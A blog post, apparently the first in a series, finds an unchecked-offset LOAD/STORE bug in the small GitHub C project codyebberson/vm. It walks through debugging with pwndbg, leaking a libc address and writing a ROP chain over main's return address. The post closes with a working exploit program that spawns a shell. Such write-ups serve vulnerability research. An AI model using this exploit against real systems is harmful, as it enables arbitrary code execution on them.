Finding memory bugs in random github projects Num. 1: codyebberson/vm
Recently I’ve become a bit fed up with CTF’s and wanted to test my skills on real targets. I tried finding bugs in popular softwares such as Filezilla but I hit the wall every single time. Instead of directly targeting softwares that have been pentested thousands of times I’ve decided to experiment on smaller projects with less visibility. This series of posts will essentially be me trying to find memory corruptions in github projects and then ton to exploit them to spawn a shell (which is usually not trivial).
To kick things off, I’ve chosen a small project with only few stars (46 at the moment) and no updates in the past decade.
The Target
The repository is https://github.com/codyebberson/vm and “A simple VM in C Based on Terence Parr’s simple-virtual-machine https://github.com/parrt/simple-virtual-machine".
It’s an easy target ‘cause the codebase is rather small, considering I have quite some experience with microarchitecture and that it’s quite easy to mess up your code on a VM lol.
Presentation of the Virtual Machine
The code fits in a single vm.c
file and primarily operates within the vm_exec
function.
The vm only have 3 registers:
- pc
- fp
- sp
And stack of 8000 bytes
Here’s a glimpse into it’s code:
1
2int ip = 0; // instruction pointer register
3int sp = -1; // stack pointer register
4int fp = -1; // frame pointer register
5int stack[DEFAULT_STACK_SIZE];
6
And the code to execute by the VM is stored in an array of integer called code
who is supplied by the user.
It has 15 instructions in total:
3 operations related instructions:
IADD
,ISUB
,IMUL
2 comparisons related instructions:
ILT
,IEQ
3 jump related instructions:
BR
,BRT
,BRF
6 memory related instructions:
ICONST
,POP
,LOAD
,STORE
,GLOAD
,GSTORE
and finally, one syscall:
PRINT
(which prints a 4 bytes integer)
(since I won’t talk about every instruction, if you’d wish to look into more details, here is the link to see the implementations of those: https://github.com/codyebberson/vm/blob/5f05c8bd1abe77fb322e45541d76e29d07f94a25/vm.c#L64)
The arguments for the instructions are supposed to go after the instruction and can be up to 8 bytes long.
As an example, the ICONST
instruction which pushes an integer to the stack works this way:
1case ICONST:
2 stack[++sp] = code[ip++]; // push operand
3 break;
In pseudo code it gives something like that:
sp = sp + 1
ip = ip += 1
stack[sp] = code[ip]
So basically, it increments the program counter, accesses the variable code (which contains the code you gave to the VM) with the program counter as index and then sets the next value of the stack pointer as so.
VMs often falter with load and store instructions (you can read this paper on the security issues of virtualization), neglecting bounds checking. Despite the stack’s limit of 8000 bytes, arguments up to 8 bytes can be supplied, allowing access to values up to 0xffffffff bytes.
Let’s check the implementation of those two instructions:
1
2case LOAD:
3 offset = code[ip++];
4 stack[++sp] = stack[fp+offset];
5 break;
6
7case STORE:
8 offset = code[ip++];
9 stack[fp+offset] = stack[sp--];
10 break;
It didn’t miss… The use of offset in these instructions can lead to out-of-bound reads and writes due to its unrestricted value range.
The binary has every protections (NX/PIE/Full RELRO) so in order to do interesting things such as spawning a shell, we must leak data.
The binary we are working on has a very tiny amount of gadgets if not none. Consequently, we must use the libc which is a bummer because it means that the exploit will rely on your LIBC’s version. It’s still possible to make the exploit work even if you don’t have the version of the LIBC: you’ll need to leak a known symbol and then you’ll need to use https://libc.blukat.me to find the version of the LIBC you are working with.
Personnally, I will be working with the GLIBC 2.35-0ubuntu3.8.
Let’s compile and debug the binary to see what we are working with under the hood.
Compiling
To test the vm, the maintainer gave us a vmtest.c
file as an example program. I adjusted it a bit so it wouldn’t be too long, also because I only want to see the LOAD and STORE instructions.
1
2#include <stdio.h>
3#include "vm.h"
4
5int hello[] = { // the code that will be executed
6 LOAD, 1,
7 STORE, 1,
8 HALT
9
10};
11
12
13int main(int argc, char *argv[])
14{
15 vm_exec(hello, sizeof(hello), 0, 0, 0);
16 return 0;
17}
18
We can then compile with the following command:
1
2~/PwnSearch/VM/codyVM » make vmtest.exe
3gcc -c -O3 -std=c99 [yapping ...] -o vmtest.o vmtest.c
4gcc [more yapping ...] -o vmtest.exe vm.o vmtest.o
(the file is named vmtest.exe
but it’s an ELF file)
Debugging
I will be using GDB along with pwndbg in order to debug.
The instructions that we want to debug are the LOAD and STORE instructions, let’s see how they are implemented. In order to do this, I am going to put a breakpoint on both instructions.
Instead of decompiling the binary and since I am a goat I’ll use the -g flag to compile and set breakpoints on specific lines. I updated the Makefile accordingly:
1CC = gcc
2CFLAGS = -O3 -std=c99 -pedantic -pedantic-errors -g -fno-exceptions \
3 -Wl,-z,relro -Wl,-z,now -fvisibility=hidden -W -Wall \
4 -Wno-unused-parameter -Wno-unused-function -Wno-unused-label \
5 -Wpointer-arith -Wformat -Wreturn-type -Wsign-compare -Wmultichar \
6 -Wformat-nonliteral -Winit-self -Wuninitialized -Wno-deprecated \
7 -Wformat-security -Werror -Wformat=2 -Wno-format-nonliteral -Wshadow \
8 -Wpointer-arith -Wcast-qual -Wmissing-prototypes -Wno-missing-braces
9LINK = gcc
10LINKFLAGS = -Wl,-O1 -Wl,--discard-all -Wl,--no-undefined -g
11
12all: vmtest.exe
13vmtest.exe: vm.o vmtest.o
14 $(LINK) $(LINKFLAGS) -o $@ $^
15%.o: %.c
16 $(CC) -c $(CFLAGS) -o $@ $<
17clean:
18 rm -rf *.exe
19 rm -rf *.o
We can finally start debugging the binary…
The lines I want to debug are the 103th and the 111th. To do so I launched gdb and I then inserted this command:
$ gdb -q vmtest.exe
Reading symbols from vmtest.exe...
pwndbg> b vm.c:103
Breakpoint 1 at 0x1570: file vm.c, line 104.
pwndbg> b vm.c:111
Breakpoint 2 at 0x1510: file vm.c, line 112.
pwndbg> r
The first breakpoint hit corresponds to the LOAD
instruction, responsible for loading data from the stack using the provided offset.
pwndbg> context disasm
──────────────────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────────────────────────────────────────────────────────────
► 0x555555555570 <vm_exec+944> mov rax, qword ptr [rbp - 0xff0] <vm_exec+944>
0x555555555577 <vm_exec+951> movsxd r9, r14d
0x55555555557a <vm_exec+954> add ebx, 1
0x55555555557d <vm_exec+957> add r12d, 2
0x555555555581 <vm_exec+961> mov eax, dword ptr [rax + r9*4]
0x555555555585 <vm_exec+965> sub eax, 1
0x555555555588 <vm_exec+968> cdqe
0x55555555558a <vm_exec+970> mov edx, dword ptr [rbp + rax*4 - 0xfe0]
0x555555555591 <vm_exec+977> movsxd rax, ebx
0x555555555594 <vm_exec+980> mov dword ptr [rbp + rax*4 - 0xfe0], edx
0x55555555559b <vm_exec+987> jmp vm_exec+288 <vm_exec+288>
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> ni 7
long story short, mov edx, dword ptr [rbp + rax*4 - 0xfe0]
is the instruction that loads the data and the value of the register rax
is the offset we entered. Let’s see what data is laying around:
1pwndbg> x/40a $rbp + $rax*4 - 0xfe0
20x7fffffffca60: 0x8 0x46474e550
30x7fffffffca70: 0x1e3e4c 0x1e3e4c
40x7fffffffca80: 0x1e3e4c 0x70d4
50x7fffffffca90: 0x70d4 0x4
60x7fffffffcaa0: 0x66474e551 0x0
70x7fffffffcab0: 0x0 0x0
80x7fffffffcac0: 0x0 0x0
90x7fffffffcad0: 0x10 0x46474e552
100x7fffffffcae0: 0x2158f0 0x2168f0
110x7fffffffcaf0: 0x2168f0 0x3710
120x7fffffffcb00: 0x3710 0x1
130x7fffffffcb10: 0x0 0x7ffff7fcbc83 <_dl_map_object_from_fd+179>
140x7fffffffcb20: 0x4 0x7fffffffc800
150x7fffffffcb30: 0x1000 0x210003
160x7fffffffcb40: 0xffffffff89e 0x7fffffffc800
170x7fffffffcb50: 0x3 0x0
180x7fffffffcb60: 0x0 0x7ffff7ffe118 <_r_debug>
190x7fffffffcb70: 0x7fff00000004 0x1
200x7fffffffcb80: 0x228e50 0x5555555544f5
210x7fffffffcb90: 0x7ffff7fbd140 0x3
As you can see, we have a libc address at address 0x7fffffffcb18. This is the address we will be using to leak the libc. By providing the offset 1, the address we are loading is 0x7fffffffca60, so if we want to load 0x7fffffffcb18 we must use the offset (0x7fffffffcb18-0x7fffffffca60)/4 + 1 = 47 (we are dividing by 4 because we are loading DWORDs).
Another thing to look for is the distance between the return address of the function main and 0x7fffffffca60. I used the command retaddr
of pwndbg for this:
1pwndbg> retaddr
20x7fffffffda48 —▸ 0x5555555550c0 (main+32) ◂— xor eax, eax
30x7fffffffda58 —▸ 0x7ffff7da4d90 (__libc_start_call_main+128) ◂— mov edi, eax
40x7fffffffdaf8 —▸ 0x7ffff7da4e40 (__libc_start_main+128) ◂— mov r15, qword ptr [rip + 0x1f0159]
50x7fffffffdb48 —▸ 0x5555555550f5 (_start+37) ◂— hlt
The return address is at 0x7fffffffda48 and the base address of the vm stack is at 0x7fffffffca60 so it’s at offset (0x7fffffffda48-0x7fffffffca60)/4 + 1 = 1019.
Another thing to mention would be that (for my version of the libc) the libc address we will be leaking is at 0x250c83 bytes from the libc base address
I obtained such results like this:
1pwndbg> vmmap libc
2LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
3 Start End Perm Size Offset File
4 0x7ffff7d7b000 0x7ffff7da3000 r--p 28000 0 /usr/lib/x86_64-linux-gnu/libc.so.6
5 0x7ffff7da3000 0x7ffff7f38000 r-xp 195000 28000 /usr/lib/x86_64-linux-gnu/libc.so.6
6 0x7ffff7f38000 0x7ffff7f90000 r--p 58000 1bd000 /usr/lib/x86_64-linux-gnu/libc.so.6
7 0x7ffff7f90000 0x7ffff7f91000 ---p 1000 215000 /usr/lib/x86_64-linux-gnu/libc.so.6
8 0x7ffff7f91000 0x7ffff7f95000 r--p 4000 215000 /usr/lib/x86_64-linux-gnu/libc.so.6
9 0x7ffff7f95000 0x7ffff7f97000 rw-p 2000 219000 /usr/lib/x86_64-linux-gnu/libc.so.6
10pwndbg> distance 0x7ffff7d7b000 0x7ffff7fcbc83
110x7ffff7d7b000->0x7ffff7fcbc83 is 0x250c83 bytes
We now have every primitives to pop our shell.
Spawning a shell
We will now be writing our program for the VM to run and to spawn our shell:
Here is what we need to do:
- Use the
LOAD
instruction to leak the libc address and subtract 0x250c83 to obtain the libc base. - Use the
STORE
instruction to overwrite the return address of the main function with an arbitrary address.”
Here is how I managed to do it:
1int program[] = {
2
3
4 //1. Overwrite return address with a ret for our silly silly __libc_system function which has alignment issues.
5 LOAD, 47, // Low part of the libc address
6 ICONST, 2428035, // Push 2428035 on the stack to be able to substract
7 ISUB, // set to libc base LIBC
8 ICONST,0x029139,
9 IADD, // Add 0x029139 to the base address because our ret gadget is 0x029139 higher
10 LOAD, 48, // Higher part of the libc address
11 STORE, 1020, // High part of the return address
12 STORE, 1019, // Low part of the return address
13
14 //2. Put pop rdi ; ret
15 // similar than prior but this time we add 0x02a3e5 to reach a pop rdi ; ret gadget in the libc
16 LOAD, 47,
17 ICONST, 2428035,
18 ISUB,
19 ICONST, 0x02a3e5,
20 IADD,
21 LOAD, 48,
22 STORE, 1022,
23 STORE, 1021,
24
25 //3. Put /bin/sh
26 // similar than prior but this time we add 1934968 to reach the address of /bin/sh in the libc
27 LOAD, 47,
28 ICONST, 2428035,
29 ISUB,
30 ICONST, 1934968,
31 IADD,
32 LOAD, 48,
33 STORE, 1024,
34 STORE, 1023,
35
36 //4. Put __libc_system
37 // similar than prior but this time we add 331120 to reach the address of __libc_system in the libc
38 LOAD, 47,
39 ICONST, 2428035,
40 ISUB,
41 ICONST, 331120,
42 IADD,
43 LOAD, 48,
44 STORE, 1026,
45 STORE, 1025,
46
47 HALT // Make the vm_exec function returns and jump to our modified return address value.
48};
Which gives us the following vmtest.c
:
1#include <stdio.h>
2
3int program[] = {
4 [...]
5};
6
7
8int main(int argc, char *argv[])
9{
10 vm_exec(program, sizeof(program), 0, 0, 0);
11 return 0;
12}
We can now compile with make all
.
And now for the moment you’ve all been waiting for:
1~/PwnSearch/VM/codyVM » ./vmtest.exe
2$ ls
3LICENSE Makefile README.md vm.c vm.h vm.o vmtest.c vmtest.exe vmtest.o
4$ id
5uid=1000(number) gid=1000(number) groups=1000(number)
Conclusion
This initial exploration into codyebberson/vm has provided a very small insights into real-world application vulnerabilities within smaller GitHub projects. Stay plugged for more episodes as I continue to uncover and exploit memory bugs in various repositories.
chopin ftw